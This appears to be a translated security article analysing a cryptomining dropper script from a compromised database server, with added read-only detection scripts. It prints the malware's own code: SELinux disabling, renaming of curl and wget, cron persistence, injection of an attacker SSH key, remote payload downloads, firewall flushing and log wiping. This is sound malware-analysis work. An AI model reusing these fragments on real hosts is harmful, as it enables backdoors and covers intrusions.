
How to write the mining script of the database

2025-03-28 Update From: SLTechnology News&Howtos > Network Security


Shulou(Shulou.com)05/31 Report--

This article walks through a cryptomining shell script found on a compromised database server, fragment by fragment, and explains what each piece does to the host. Many administrators run into exactly this situation in practice, so it is worth reading carefully.

01.Code 1

#!/bin/sh

The first line of the script looks like a comment, but it is not: the shebang tells the kernel which shell (interpreter) will execute the rest of the file.

Our everyday shells such as bash and zsh are, for practical purposes, supersets of POSIX sh. By asking for sh the script runs on the widest range of hosts, including minimal images where /bin/sh is dash or busybox. Keep that in mind, because some later fragments use bash-only syntax that a strict sh does not understand.

02.Code 2

setenforce 0 2>/dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null

SELinux is not a firewall but Linux's mandatory access control layer, and setenforce is the command that switches its mode. Executing setenforce 0 puts the running kernel into permissive mode; the second line rewrites the configuration file so that SELinux stays disabled after a reboot. The 2 in 2> is file descriptor 2, standard error (stderr).

So the redirection sends the commands' error output to /dev/null, a virtual device that discards everything written to it. On hosts without SELinux, or when the script is not root, the commands would complain; this way they fail silently. Very suitable for doing bad things quietly. For a defender, a process writing to /etc/sysconfig/selinux is itself a useful alert.

03.Code 3

sync && echo 3 > /proc/sys/vm/drop_caches

The script kindly frees us some memory, so that more of it is available for mining.

As we all know, a Linux system that has run for a long time holds a lot of file data in the page cache, plus dentry and inode caches. They are dropped by writing a number to /proc/sys/vm/drop_caches: 1 for the page cache, 2 for dentries and inodes, 3 for both, which is the usual choice. No data is lost, but everything dropped has to be read from disk again, so a busy database server feels it.

sync first flushes all dirty (unwritten) buffers to disk. Only clean pages can be dropped, so after sync the cache can be released safely and completely.

04.Code 4

crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
cat 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur

Yes, these statements are just routine setup: the path of the current user's crontab and its contents, root's authorized_keys, and the paths of the download tools. The one thing worth a close look is the use of mv to rename some of our everyday commands.

The net effect is that wget becomes /usr/bin/wge and curl becomes /usr/bin/cur (the intermediate names get and url, and the mv of xget and xurl, only matter on a repeat run). After that an administrator typing curl gets "command not found", and so does every other script on the host, rival miners included, while this script keeps working through the renamed copies that its downloads function looks for later. Tampering with system binaries like this is not housekeeping; it is the kind of modification that makes the script a crime rather than an experiment.

To reuse pieces of logic, the script abstracts a lot of functions. Let's skip straight to the execution of the main function and look at the flow.

05.Code 5

The first is the kill_miner_proc function. It is very long, so only part of it is shown.

kill_miner_proc() {
    ps auxf | grep -v grep | grep "mine.moneropool.com" | awk '{print $2}' | xargs kill -9
    ...
    pkill -f biosetjenkins
    pkill -f Loopback
    ...
    crontab -r
    rm -rf /var/spool/cron/*
}

Mining is a field of love and murder. This function first combines ps, grep and kill to kill rival miners, here recognised by the pool name mine.moneropool.com on their command line, and then removes every cron job so that the rivals cannot come back: thieves robbing thieves. Note that crontab -r and rm -rf /var/spool/cron/* also wipe the administrator's own scheduled jobs, for every user.

The function also uses pkill. Unlike kill, which needs a pid, pkill looks the processes up itself; with -f the pattern is matched against the full command line rather than just the process name, so anything started with biosetjenkins or Loopback anywhere in its arguments is terminated. It is the more violent option.

06.Code 6

The next step is the kill_sus_proc function.

ps axf -o "pid" | while read procid
do
    ...
done

ps with the -o option lets you choose the output columns; here only the pid of each process is printed. The output is piped into a while loop, where the read builtin reads one pid per line into procid. (The header line PID is read as well, so the first iteration looks at /proc/PID/exe, which does not exist.)

07.Code 7

ls -l /proc/$procid/exe | grep /tmp
if [ $? -ne 1 ]
then
    ...
fi

That is the body of the loop, and it shows the syntax of the if statement. $? is the exit status of the previous command, here grep.

0 means success, any other value failure; for grep specifically, 0 means a match, 1 no match, 2 an error. -ne means "not equal", so [ $? -ne 1 ] is read as "grep did find tmp": any process whose executable lives under /tmp, a favourite place for dropped binaries, is handled in the then branch (the elided part kills it). The precise test would be -eq 0; -ne 1 also accepts grep's error status, which errs on the side of killing.

08.Code 8

ps axf -o "pid %cpu" | awk '{if ($2 >= 40.0) print $1}' | while read procid
do
    ...
done

Ha, another traversal loop. This time the targets are processes using 40 per cent or more of a CPU. That is rather ruthless: whatever gets in the way of mining dies, legitimate database workload included, which is usually the moment administrators start noticing that something is wrong.
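The two heuristics the script uses to pick its victims, an executable under /tmp and a CPU share above a threshold, are also reasonable triage signals. Below is an added example, not code from the analysed script, that reuses them read-only: the text helpers take their input on stdin or as arguments so they can be checked on constructed samples, and live_hunt() wires them to ps and /proc on a Linux host and only prints, it never kills. The 40 per cent threshold is the script's; the paths matched besides /tmp (/var/tmp, /dev/shm, deleted binaries) are an assumption for illustration.

```shell
#!/bin/sh
# Added example (not part of the analysed script): the script's own two
# victim heuristics, exe under /tmp and CPU share at or above a threshold,
# turned into a read-only triage helper.

# Print the pid from every "pid %cpu" line whose CPU share is >= $1 (default 40).
# The ps header line ("PID %CPU") is skipped because its first field is not numeric.
high_cpu_pids() {
    awk -v limit="${1:-40}" '$1 ~ /^[0-9]+$/ && $2 + 0 >= limit { print $1 }'
}

# Exit 0 when a resolved /proc/<pid>/exe path is where droppers hide binaries.
# The script tested `ls -l /proc/$pid/exe | grep /tmp`; /var/tmp, /dev/shm and
# the "(deleted)" suffix (binary unlinked after launch) are added assumptions.
suspicious_exe_path() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *" (deleted)")               return 0 ;;
        *)                           return 1 ;;
    esac
}

# Resolve the executable of a live pid; empty string if it is gone or unreadable.
exe_of_pid() {
    readlink "/proc/$1/exe" 2>/dev/null || printf ''
}

# Walk the live process table and report, without killing, every process that
# either heuristic flags.  Output: pid, %cpu, exe, reason (tab separated).
live_hunt() {
    limit="${1:-40}"
    ps ax -o pid= -o %cpu= 2>/dev/null | while read -r pid cpu; do
        exe=$(exe_of_pid "$pid")
        reason=""
        if suspicious_exe_path "$exe"; then reason="exe-in-tmp"; fi
        if [ -n "$(printf '%s %s\n' "$pid" "$cpu" | high_cpu_pids "$limit")" ]; then
            reason="${reason:+$reason,}high-cpu"
        fi
        if [ -n "$reason" ]; then
            printf '%s\t%s\t%s\t%s\n' "$pid" "$cpu" "${exe:-?}" "$reason"
        fi
    done
}

# Run the live hunt only when asked, so the file can also be sourced for its helpers:
#   sh hunt.sh --hunt 40
if [ "${1:-}" = "--hunt" ]; then
    live_hunt "${2:-40}"
fi
```

A hit on exe-in-tmp is worth far more than a hit on high-cpu alone: a long-running backup or a busy database will trip the CPU rule, which is exactly why the script's kill-everything approach is so disruptive.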

09.Code 9

Next, the script branches on who is running it.

The root case comes first. It does not call id or look at $UID; it tests whether the file $rtdir (/etc/sysupdates) exists. That file was created by the redirect in Code 4, which only succeeds when the script can write to /etc, so its presence is a cheap proxy for root.

chattr -i /etc/sysupdate*
chattr -i /etc/config.json*
chattr -i /etc/update.sh*
chattr -i /root/.ssh/authorized_keys*
chattr -i /etc/networkservice

The script's own files end up protected with the immutable attribute, which is bad enough: while chattr +i is set, even root cannot modify, rename or delete them, and rm simply fails, until the attribute is cleared with chattr -i. The fragment shown here is that clearing step, run first so that a fresh copy of the dropper can overwrite the files left by an earlier run. Then cron is used to add the script's "update service" as a scheduled task.

That is the following fragment.

10.Code 10

if [ ! -f "/usr/bin/crontab" ]
then
    echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1" > ${crondir}
else
    [[ $cont =~ "update.sh" ]] || (crontab -l; echo "*/30 * * * * sh /etc/update.sh >/dev/null 2>&1") | crontab -
fi

If the crontab command is missing, the entry is written straight into the spool file; otherwise the oddly shaped [[ $cont =~ "update.sh" ]] comes into play. [[ ]] is a shell builtin (bash, zsh, ksh; not POSIX sh) that supports pattern matching on strings.

With =~ the right-hand side is treated as an extended regular expression, which is excruciatingly powerful; in bash a quoted right-hand side is matched literally, so here it is a plain substring test for update.sh. The test produces an exit status, so it can be chained with ||: if the crontab read in Code 4 already mentions update.sh nothing happens, otherwise the group on the right runs. One caveat for anyone reading this under #!/bin/sh: on Debian and Ubuntu /bin/sh is dash, where [[ is not a builtin; the test then fails with "[[: not found" and the || branch appends a fresh line on every run, so an infected host can accumulate duplicate entries every 30 minutes.

The parentheses that follow form a subshell group. The commands inside run in a child shell, separated by semicolons (the last one needs none), and their combined standard output, the existing crontab plus the new line, is piped into crontab -, which replaces the crontab with what it reads. This is not the same as backquotes: a subshell's output goes wherever its stdout points, whereas `cmd` captures the output into a string.

11.Code 11

With the scheduled task in place, the script sets up password-less SSH login for the attacker by appending a public key to root's list of trusted keys.

chmod 700 /root/.ssh/
echo >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/

The rest of the key, and the rest of the command, are cut off in the listing. The bare echo >> first makes sure the new key starts on its own line even if the existing file has no trailing newline, and the two chmod calls give the directory and file exactly the permissions sshd's StrictModes insists on, so the key is accepted rather than ignored. Nothing is removed, so a defender comparing authorized_keys against a known-good copy spots this immediately.

12.Code 12

Speak of the devil: the next fragment uses backquotes (command substitution).

filesize_config=`ls -l /etc/config.json | awk '{print $5}'`
if [ "$filesize_config" -ne "$config_size" ]
then
    pkill -f sysupdate
    rm /etc/config.json
    downloads $config_url /etc/config.json $config_url_backup
else
    echo "no need download"
fi

The roundabout ls -l | awk '{print $5}' pulls the size of /etc/config.json out of the long listing (stat -c %s would do the same). If the size differs from the expected $config_size, the running sysupdate process is killed, the file is removed and a fresh copy is fetched with the script's own downloads function. Size is a weak integrity check: an edit that keeps the length is never noticed, and any edit that changes it, an administrator's included, simply triggers a re-download.

Shell functions look odd at first sight: arguments are passed positionally, and inside the function they are read as $1, $2, $3, exactly as a script reads its command line.

13.Code 13

Downloads $config_url / etc/config.json $config_url_backup

Three arguments are passed: the URL, the destination path and a fallback URL. The files naturally come from a remote server, whose domain name ends in .de. That is Germany's country-code TLD, but anyone can register one, so it says nothing about where the server or its operator really is; nothing else is known about it.

downloads() {
    if [ -f "/usr/bin/curl" ]
    then
        echo $1 $2
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        http_code=`cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
        then
            wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

In my opinion this function is long-winded and does not show much skill. The four branches differ only in the name of the downloader, and a single variable holding that name would have collapsed them; it reads like something written in a hurry with no thought of reuse. Note also the last branch: wge re-fetches from the backup URL when the first download succeeded (-eq 0), the opposite of the wget branch (-ne 0), which looks like a copy-and-paste slip.

As mentioned above, the script renamed several commands, curl among them, which is why cur and wge appear as fallbacks. curl is powerful enough that the author cannot resist piling on options:

-I: send a HEAD request, fetching only the response headers.

-m: maximum time the whole transfer may take, in seconds.

-o: file to write the body to. Here it is /dev/null, er, er.

-s: silent mode, no progress meter and no error messages.

-w %{http_code}: after the transfer, print the HTTP status code; this is what gets captured into $http_code.

--connect-timeout: seconds allowed for establishing the connection.

--retry: number of retries on transient errors, a ruthless 100, with curl backing off between attempts.

The probe decides the source: status 200 means the primary URL is fine; 405 (Method Not Allowed) means the server rejects HEAD but may still serve GET, so the primary URL is tried anyway; anything else falls back to the third argument, the backup URL.

No curl? Then the substitute wget is used, same routine, with --timeout and --tries standing in for the curl options.

14.Code 14

Then comes a series of similar operations and, finally, a batch of iptables changes.

iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload

-F flushes every rule and -X deletes every user-defined chain, so whatever firewall the administrator had configured is gone. The four OUTPUT rules drop outbound connections to 3333, 5555, 7777 and 9999, ports commonly used by mining pools for the stratum protocol; the script's own pool presumably listens on some other port, so this starves rival miners on the same host. The INPUT rule blocks one source address outright. Both are good signals for a defender: a host that suddenly drops traffic to stratum ports it never legitimately used has been claimed by someone.

15.Code 15

The careful script writer also cleans up the operation logs.

history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history

history -c only clears the in-memory history of the current shell, and only in bash; under sh it is just "history: not found". The echo > lines do not delete the logs but overwrite them with a single newline, which is itself an indicator: a one-byte wtmp or secure log with a fresh modification time is not something a healthy system produces, and since wtmp holds fixed-size binary records, last shows nothing after this. Forwarding logs to a remote host makes the whole step pointless.

That is the end of "how to write the mining script of the database". Thank you for reading.
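The fragments above (Code 9 to Code 15) leave a consistent set of artefacts on an infected host: the cron entry, immutable files under /etc, egress DROP rules on stratum ports, the injected key in authorized_keys, the renamed curl and wget, and logs truncated to one byte. Below is an added example, not code from the analysed script, that sweeps a host for them read-only. Each check_* helper reads the relevant text on stdin and exits 0 when the indicator is present, so the same logic runs on files copied out of a disk image and on constructed samples; sweep() feeds the helpers from the live commands. Paths, ports and the key prefix come from the listing; the label text and the choice of log files to test are assumptions.

```shell
#!/bin/sh
# Added example (not part of the analysed script): read-only sweep for the
# persistence and tampering artefacts described in Code 9 to Code 15.

# Cron line that re-runs the dropper: "*/30 * * * * sh /etc/update.sh ...".
check_cron() {
    grep -Eq '(^|[[:space:]]|/)(update\.sh|sysupdate|networkservice)([[:space:]]|$)'
}

# lsattr output lines: flag string in $1, path in $2.  The script pins these
# paths with chattr +i so they survive rm even as root.
check_immutable() {
    awk '$1 ~ /i/ && $2 ~ /^\/(etc\/(sysupdate|config\.json|update\.sh|networkservice)|root\/\.ssh\/authorized_keys)/ { hit = 1 }
         END { exit hit ? 0 : 1 }'
}

# iptables-save / iptables -S lines: outbound DROP on the stratum ports the
# script blocks to starve competing miners.
check_iptables() {
    grep -Eq -e '^-A OUTPUT .*--dport (3333|5555|7777|9999)([[:space:]]|$).*-j DROP'
}

# authorized_keys lines: the attacker key, matched on the prefix shown in Code 11.
check_authorized_keys() {
    grep -Fq 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9WKiJ7yQ6HcafmwzDMv1RKxPdJI/'
}

# A log emptied with "echo >" is one byte long, not zero: echo writes a newline.
# Takes a path; exit 0 when the file exists and holds at most one byte.
log_wiped() {
    [ -f "$1" ] && [ "$(wc -c < "$1" | tr -d ' ')" -le 1 ]
}

# Filesystem checks take no stdin: the renamed tools and dropper files are
# plain existence tests on the names from Code 4 and Code 9.
renamed_tools_present() {
    for f in /usr/bin/cur /usr/bin/wge; do
        [ -e "$f" ] && return 0
    done
    return 1
}

dropper_files_present() {
    for f in /etc/sysupdates /etc/sysupdate /etc/update.sh /etc/config.json /etc/networkservice; do
        [ -e "$f" ] && return 0
    done
    return 1
}

report() {   # report <label> <check-function>; the check reads stdin
    if "$2"; then printf 'HIT   %s\n' "$1"; else printf 'clean %s\n' "$1"; fi
}

sweep() {
    cat /var/spool/cron/* /var/spool/cron/crontabs/* /etc/crontab /etc/cron.d/* 2>/dev/null \
        | report "cron runs the dropper" check_cron
    lsattr /etc/sysupdate* /etc/config.json /etc/update.sh /etc/networkservice /root/.ssh/authorized_keys 2>/dev/null \
        | report "immutable attribute on dropper files" check_immutable
    iptables-save 2>/dev/null | report "egress DROP on stratum ports" check_iptables
    cat /root/.ssh/authorized_keys 2>/dev/null | report "attacker key in authorized_keys" check_authorized_keys
    report "renamed curl/wget copies (/usr/bin/cur, /usr/bin/wge)" renamed_tools_present </dev/null
    report "dropper files under /etc" dropper_files_present </dev/null
    for f in /var/log/wtmp /var/log/secure /root/.bash_history /var/spool/mail/root; do
        if log_wiped "$f"; then printf 'HIT   %s truncated to <= 1 byte\n' "$f"; fi
    done
}

# Run the live sweep only when asked (needs root for lsattr/iptables-save):
#   sh sweep.sh --sweep
if [ "${1:-}" = "--sweep" ]; then
    sweep
fi
```

Run it from a known-clean shell (the host's own curl, wget and ps may be gone or replaced), and treat every HIT as a reason to image the machine rather than to start deleting: chattr -i followed by rm removes the files, but not the attacker's key, the cron line or whatever the update.sh fetched next.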
